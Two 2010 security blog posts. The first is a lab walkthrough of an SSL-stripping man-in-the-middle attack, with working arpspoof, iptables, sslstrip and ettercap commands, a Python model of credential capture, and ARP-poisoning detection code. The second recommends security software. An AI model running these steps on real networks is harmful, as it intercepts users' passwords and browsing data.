Thursday, July 29, 2010

Insecurities of Today's Websites and How to Abate the Risk

Online activity by individuals grows daily: social networking, e-mail, shopping, money transfers through third parties, and so on.  End-users expect these transactions to be protected by a username/password and SSL encryption.  Unfortunately, this is not the case with many popular websites.  I will demonstrate the weakness of common websites by intercepting a username/password in clear text, and at the end of the presentation I will present a defence that keeps you from becoming a victim of this type of attack.

Presently, there is a false sense of online security.  For example, when a user visits facebook.com, the address bar displays http://www.facebook.com.  The user enters their username/password and clicks "login."  Clicking "login" submits the form to the encrypted site, and the user can verify this by watching the address change to https://www.facebook.com.  The added "s" at the end of http stands for "secure": the SSL/TLS protocol provides encryption and authentication of the server.

The flaw in this design is the initial unencrypted page on which the user enters their information.  Because that page arrives over plain HTTP, an attacker on the path can rewrite it so that the login form submits over HTTP instead of HTTPS, read the credentials as they pass, and then forward them to Facebook's server over a connection of his own so that the user still receives the page they requested.  The user never sees anything wrong.  This is a Man-in-the-Middle (MITM) attack: the attacker sits between the user's computer and the website's server, viewing and recording all communication.


Now, for the demonstration.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4.  This is a Linux distribution containing a collection of penetration testing tools.  We will be using arpspoof, SSLstrip, and Ettercap, all of which are included with the Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. A wireless adapter.  I am using the Alfa AWUS036H Wireless Adapter; the USB connection, good antenna, and ease of use make it a good choice.  Note that this particular attack runs over an ordinary association with the access point, so support for passive packet sniffing and packet injection is not actually required here; it matters for other wireless attacks.

3. A test network lab with two computers - the attacker and the victim - and a router or wireless access point.  I will be using a wireless access point to demonstrate the ease of the attack and the needed security awareness and precautions when accessing open Wi-Fi areas.

Steps:

1.    Boot up Backtrack.  The login is "root" and the password is "toor."  Do not include quotes or the period at the end of toor.  Type "startx" at the next prompt.

2.    Open up a Konsole window.  It is the 3rd icon from the bottom right.

3.    Type /etc/init.d/wicd start

4.    Click the KDE menu / go to Internet / click Wicd Network Manager and connect to the particular network.  Close the window and go back to the Konsole window.

5.    Type clear and hit enter

6.    Type kate /etc/etter.conf


7.    This command will open the file etter.conf in a notepad-type program called Kate.

8.    Scroll down to the "Linux" section and delete the two pound signs under "if you use iptables:", i.e. uncomment the redir_command_on and redir_command_off lines.

9.    Once you have completed the step, save the file and close the window.  The pound signs mark comments.  In programming, comments are written for the programmer, not for the program, so with the pound signs left in, these two lines would not run when ettercap needs them later in the demonstration.

10.    Go back to the Konsole window and type echo 1 > /proc/sys/net/ipv4/ip_forward

11.    This enables IP forwarding in the Linux kernel, so our Backtrack computer acts as a router: packets the victim sends to us that are not addressed to us are passed on to the real gateway instead of being dropped.  Without it, the victim loses connectivity the moment we poison its ARP cache, which would give the attack away.  In short, the victim's computer will send all its traffic to our computer, and we relay it to the wireless access point.

12.    Type clear to clear our window.

13.    Type arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
  • arpspoof sends unsolicited ARP replies, which lets us claim any IP address on the local network.
  • -i is the interface we are using: wlan0.
  • -t is the target.  Following the option is the target/victim's IP address, 192.168.1.100.
  • Following the victim's IP address is the IP address of the real wireless router (gateway) that we are impersonating, fooling the victim's computer into sending us its traffic.
  • When we hit enter, we start telling the victim that the gateway IP is at our MAC address.  From then on, the target sends its traffic to us instead of to the real gateway.  This poisons only the victim's ARP cache; because the steps below terminate the victim's HTTP connections on our machine, that is enough.  Stop arpspoof with Ctrl-C when finished; it then re-announces the real gateway MAC so the victim's ARP cache recovers.
14.    To discover your interface on Backtrack, open a Konsole window and type ifconfig.  Whatever interface has an IP address is the interface that you are utilizing.


15.    My target computer is a Windows machine.  To find its IP address, go to Start, type cmd in the run/search box, and type ipconfig in the command window to see the Ethernet adapter's IP address.


16.    You will see the target IP address; as well as, the gateway IP address.

17.    When you run the arpspoof command, it prints a line for each forged ARP reply it sends and keeps sending them until you stop it.


18.    Now, open a new Konsole window or new shell (by going to session/shell) and type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • This rule takes TCP traffic arriving from the victim that is destined for port 80 (HTTP) and redirects it to port 10000 on our computer, where we are about to start SSLstrip.  Only port 80 is redirected; HTTPS on port 443 is simply forwarded untouched, which is why the attack depends on the victim starting from an http:// page.

19.    Hit enter and type clear and hit enter to clear screen.

20.    Type sslstrip -a -k -f
  • -a logs all SSL and HTTP traffic to and from the server, not just POST requests.
  • -k kills sessions in progress.  If the victim is already logged into Gmail, Facebook, PayPal, etc., this logs them out of the site so that they log back in with their credentials while we are watching.
  • -f substitutes a lock favicon on requests that were secure, so the browser tab shows a padlock and the connection looks secure.

21.    Hit enter.  SSLstrip listens on port 10000 by default and writes sslstrip.log in the directory it was started from, the desktop in this demonstration.  This file logs all of the victim's traffic.


22.    Now, open a new Konsole window or shell (by going to session/shell).

23.    Type ettercap -T -q -i wlan0
  • -T runs ettercap in text mode (no GUI).
  • -q is quiet mode: do not display packet contents, only what the dissectors extract.
  • -i is the interface we are using.
  • Here ettercap is used only as a passive sniffer; the ARP poisoning is already being done by arpspoof.  Because SSLstrip has turned the logins into plain HTTP, ettercap's dissectors print the username/password on this Konsole window the instant the user logs into a website.  For further details of their Internet usage, view the sslstrip.log file.

24.    Hit enter; ettercap starts sniffing on wlan0 and waits for traffic.


25.    When your target visits a website requiring a username/password, the credentials are posted to your screen in clear text.  This works because the SSL session was stripped and a phony lock favicon was substituted so the session still looks secure.  The following screenshots show an SSL session being stripped.  In the first, the session is secure: the address starts with "https" and a legitimate certificate is shown at the right-hand side of the address bar.  In the second, the session has been stripped: the address starts with plain "http" and the phony lock appears at the left-hand side of the address bar.  Internet Explorer does not display the lock at the left-hand side.  Mozilla Firefox displays a green or blue bar at the left-hand side of the address bar, depending on the certificate.


26.    Now for the interception of the target's traffic.  I posted multiple screenshots of different websites that require a username/password.  The last screenshot displays the username/password in clear text.

Username: shbelay / Password: password
Username: shbelay@gmail.com / Password: password
Username: shbelay / Password: password


As you can see, the username/password is in red and the website information I intercepted is in green.  I was able to do this with multiple websites, including PayPal, Hotmail, and Amazon.  Furthermore, the sslstrip.log file logs the entire browsing session, so it may capture personally identifiable information and credit card numbers.
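To make the mechanism of steps 18 through 25 concrete, here is a small model of what SSLstrip does once the iptables rule has delivered the victim's port 80 traffic to it, together with the credential extraction that ettercap's dissectors perform on the resulting plaintext. This is an added example written for this post, not SSLstrip's or Ettercap's own code; the host, paths, form fields and credentials are constructed for illustration, and nothing is sent on the network.

```python
"""Model of the SSLstrip + ettercap stage of the demonstration (steps 18-25).

Added example, not sslstrip's or ettercap's own code. The host, paths and
form fields below are constructed for illustration; no traffic is sent.
"""
import re
from urllib.parse import parse_qs

# Matches an https URL inside HTML or headers; group 1 is "host/path?query".
HTTPS_URL = re.compile(r'''https://([^\s"'<>]+)''', re.IGNORECASE)

# Form field names that ettercap-style credential sniffing would report.
CREDENTIAL_HINTS = ("user", "email", "login", "pass", "pwd")


class Stripper:
    """Sits where iptables REDIRECT put sslstrip: on port 80, in the path.

    Responses flowing to the victim have every https:// link downgraded to
    http:// and the (host, path) is remembered. When the victim later
    requests one of those downgraded URLs over plain HTTP, the attacker
    can read it, then re-issues it to the real server over HTTPS so the
    page still works and the victim notices nothing.
    """

    def __init__(self):
        self.secure = set()    # (host, path) pairs that were https before we touched them
        self.captured = []     # (host, path, {field: value}) seen in plaintext requests

    def strip_response(self, body):
        """Rewrite https:// -> http:// in a server response and record what changed."""
        def downgrade(match):
            target = match.group(1)
            host, _, rest = target.partition("/")
            self.secure.add((host.lower(), "/" + rest))   # path keeps any query string
            return "http://" + target
        return HTTPS_URL.sub(downgrade, body)

    def upstream_scheme(self, host, path):
        """Scheme the attacker uses when forwarding the victim's request upstream."""
        return "https" if (host.lower(), path) in self.secure else "http"

    def handle_request(self, method, host, path, headers, body):
        """Process one plaintext request from the victim.

        Returns (scheme_to_forward_with, credentials_found). Credentials are
        looked for only in form POSTs, because that is where the login lands.
        """
        creds = {}
        ctype = headers.get("Content-Type", "")
        if method.upper() == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
            for name, values in parse_qs(body).items():
                if any(hint in name.lower() for hint in CREDENTIAL_HINTS):
                    creds[name] = values[0]
        if creds:
            self.captured.append((host, path, creds))
        return self.upstream_scheme(host, path), creds


# Constructed page: served over http://, but its login form posts to https://.
LOGIN_PAGE = (
    '<html><body>'
    '<form action="https://www.facebook.com/login.php" method="post">'
    '<input name="email"><input name="pass" type="password">'
    '</form></body></html>'
)


def run_exchange():
    """Replay the downgrade as the demonstration does; return what the attacker learns."""
    s = Stripper()
    stripped = s.strip_response(LOGIN_PAGE)   # what the victim's browser receives
    # The victim fills in the (now http://) form and submits it in clear text.
    scheme, creds = s.handle_request(
        "POST", "www.facebook.com", "/login.php",
        {"Content-Type": "application/x-www-form-urlencoded"},
        "email=shbelay%40gmail.com&pass=password&persistent=1",   # constructed credentials
    )
    return stripped, scheme, creds


if __name__ == "__main__":
    page, scheme, creds = run_exchange()
    print(page)
    print("forwarding over", scheme, "after capturing", creds)
```

The point the model makes explicit is that TLS is never broken: the browser simply never asks for it, because the only https:// reference it ever saw was rewritten before it arrived, and the attacker keeps the real server happy by speaking HTTPS on the victim's behalf.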

How to Protect Yourself

Protecting yourself from this type of attack is as simple as typing "https://" before the website address, so that the very first request is encrypted and there is no plain HTTP page for the attacker to rewrite.  The problem today is that websites put their username/password boxes on an unencrypted page: enter amazon.com, facebook.com, ebay.com, paypal.com, etc. and you receive an "http" site.

Of course, no one wants to type "https" every time they log on to a website.  An easy substitute is the Mozilla Firefox add-on HTTPS Everywhere, which rewrites requests to the sites on its rule list so that they go over HTTPS from the first request.  Unfortunately, Internet Explorer does not have this capability.  As a result, I recommend using Mozilla Firefox for this issue, unless you are willing to type "https://" every time in Internet Explorer.  Keep in mind that the add-on only covers sites it has rules for, and that the durable fix is for the site itself to serve its login page only over HTTPS.

I installed this add-on and was unable to strip the SSL connection.  I received the following screenshots when viewing the following websites:


The browser is informing me that it cannot verify the website server's certificate and to exit or enter at my own risk.  As always, I will mention that no computer or network is completely secure.  The intention is to be more secure than the next computer/network, or to make it as difficult as possible to break through the security barriers.
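Beyond the browser-side fix above, the attack leaves a visible trace on the victim's own machine: after arpspoof runs, the gateway's entry in the ARP cache carries the attacker's MAC address, which is the same MAC the attacker's own entry already has. The checks below spot that, first from a one-off `arp -a` dump and then continuously from the ARP replies seen on the wire. This is an added example, not part of the original post; the `arp -a` text and every address in it are constructed (the attacker MAC uses an Alfa-style prefix purely for flavour), and the same parser also accepts /proc/net/arp lines from a Linux host.

```python
"""Victim-side checks against the ARP cache poisoning used in the demonstration.

Added example, not part of the original post. The ARP table text is constructed
to look like `arp -a` on the Windows victim; /proc/net/arp on Linux is handled
by the same parser. All addresses are made up.
"""
import re
from collections import defaultdict

# IPv4 address, then somewhere later on the line a MAC written with ':' or '-'.
ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s+.*?([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})"
)


def _normalise_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` (Windows) or /proc/net/arp (Linux) output.

    Broadcast and IPv4 multicast entries are skipped: they legitimately share
    well-known MAC addresses and would otherwise look like duplicates.
    """
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if not m:
            continue
        mac = _normalise_mac(m.group(2))
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e:"):
            continue
        table[m.group(1)] = mac
    return table


def find_duplicate_macs(table):
    """MACs that answer for more than one IP.

    After `arpspoof -t <victim> <gateway>` the gateway's entry carries the
    attacker's MAC, so the attacker's own entry and the gateway's collide.
    """
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


class GatewayWatch:
    """Pin the gateway's MAC (taken from a snapshot on a trusted network) and
    alert when any ARP reply claims the gateway IP with a different MAC."""

    def __init__(self, gateway_ip, trusted_mac):
        self.gateway_ip = gateway_ip
        self.trusted_mac = _normalise_mac(trusted_mac)
        self.alerts = []

    def observe(self, sender_ip, sender_mac):
        """Feed every ARP reply seen on the wire; returns an alert string or None."""
        if sender_ip != self.gateway_ip:
            return None
        mac = _normalise_mac(sender_mac)
        if mac == self.trusted_mac:
            return None
        alert = f"ARP reply says {sender_ip} is-at {mac}, expected {self.trusted_mac}"
        self.alerts.append(alert)
        return alert


# Constructed `arp -a` output before and after the attacker runs arpspoof.
CLEAN_ARP = """\
Interface: 192.168.1.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.50          00-c0-ca-aa-bb-cc     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""
POISONED_ARP = CLEAN_ARP.replace(
    "192.168.1.1           00-11-22-33-44-55",
    "192.168.1.1           00-c0-ca-aa-bb-cc",
)


def check_snapshot(text):
    """One-shot check: the duplicate-MAC report for an ARP table dump ({} if clean)."""
    return find_duplicate_macs(parse_arp_table(text))


if __name__ == "__main__":
    print("clean:", check_snapshot(CLEAN_ARP))
    print("poisoned:", check_snapshot(POISONED_ARP))
```

On a machine you control, the practical follow-up to an alert is to pin the gateway entry (a static `arp -s` entry on Windows, or a permanent neighbour entry on Linux) so a forged reply cannot overwrite it; the watch class is the piece you would feed from a packet capture of ARP replies rather than from a one-off table dump.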

Thursday, July 8, 2010

Security Essentials for a New Personal Computer

Identity theft and malware are rising rapidly because they are profitable.  Black hat hacking has become a billion dollar business run through anonymity and covert operations.  For individuals buying new computers, it is essential to install a few security programs first.  A computer connected to the Internet as bought, with no updates or protection, can be compromised within a short period of time (often within an hour) without warning.  Anti-virus and spyware/malware protection software alone are not enough against the sophistication and ease-of-use of today's hacker tools.

Anybody can become a victim without proper precautions.  For those still skeptical, plenty of Trojans are for sale on the Internet, built specifically to steal bank account information, social security numbers, or any other personally identifiable information.  Black hat hackers scan the Internet for open ports and deliver these Trojans through exposed services or by e-mail through phishing.  Once installed and undetected, the Trojan sends the information back to the perpetrator automatically and without the person's knowledge while they log into their bank site, fill out credit card forms, or buy an item online.  We have to be very cautious and use good judgment while surfing the web.

The following are free software that I recommend to install immediately when a new computer is bought.

  1. Anti-virus software is needed to protect your computer from viruses before they cause any damage.  Avast (download) is widely used and respected; Avast also sells a paid version with greater protection.
  2. Spyware/adware/malware protection is needed to keep your browsing information from being logged and sent back to the creator without permission, possibly with malicious intent.  I install three programs, since each of them usually catches malicious software the others missed: Ad-Aware, Malwarebytes, and Spybot.
  3. A firewall is extremely important to keep hackers out.  As mentioned, they look for open ports on the individual's computer to gain complete access.  A firewall can be configured to block all incoming connections until the user permits them.  The firewall I use is Comodo Firewall.
  4. Microsoft Security Essentials is an excellent product that provides real-time protection.  I have found that it usually catches malicious software before my anti-virus and malware protection software do.  Microsoft continuously updates it with the latest threats.
  5. A registry cleaner finds suspicious entries, or entries left in the registry after uninstalling a program, and helps system performance.  A good one is CCleaner.
  6. Lastly and, I believe, most important is a patching program.  There are hacker tools that report the version of each piece of software installed on a computer.  If that software is not updated, it is extremely easy to crack into the computer using the very information the manufacturer published about the needed update.  I installed two patching programs.  The one I regularly use is FileHippo.  In addition, I periodically use Secunia PSI.  To learn more about patching and its importance, read my blog post, Importance of Patches.

Others that would be good to have but not necessary are:

  1. Microsoft Baseline Security Analyzer is designed for IT professionals in small/medium sized businesses.  I have it installed on my personal computer and find it very helpful.  The program scans the Microsoft products installed on the computer and gives suggestions and how-to's for making each product more secure.  It is a great product.
  2. I suggest using the Mozilla Firefox browser for its add-ons.  The open-source community consists of incredibly talented individuals who write software and provide it to the public free of charge.  The add-ons I use for safer browsing are NoScript, AdBlock, and HTTPS Everywhere.
  • NoScript blocks active content (Java, JavaScript, Flash, etc.) that black hat hackers commonly use to deliver and execute malicious software.  You can temporarily or permanently allow the scripts to load for a specific website.
  • AdBlock is, as you most likely have figured, an ad-blocking program.
  • HTTPS Everywhere makes the browser use the encrypted connection on sites that offer one.  The following is a quote from the website:
"Many sites on the web offer some limited support for encryption over HTTPS, but make it difficult to use. For instance, they may default to unencrypted HTTP, or fill encrypted pages with links that go back to the unencrypted site."
For now, these are my recommended programs for keeping a computer safe while browsing the Internet.  As the information security community keeps repeating, though, security never stays stagnant; it is a continuous process, because black hat hackers become more intelligent and their tools more sophisticated at cracking computers and networks.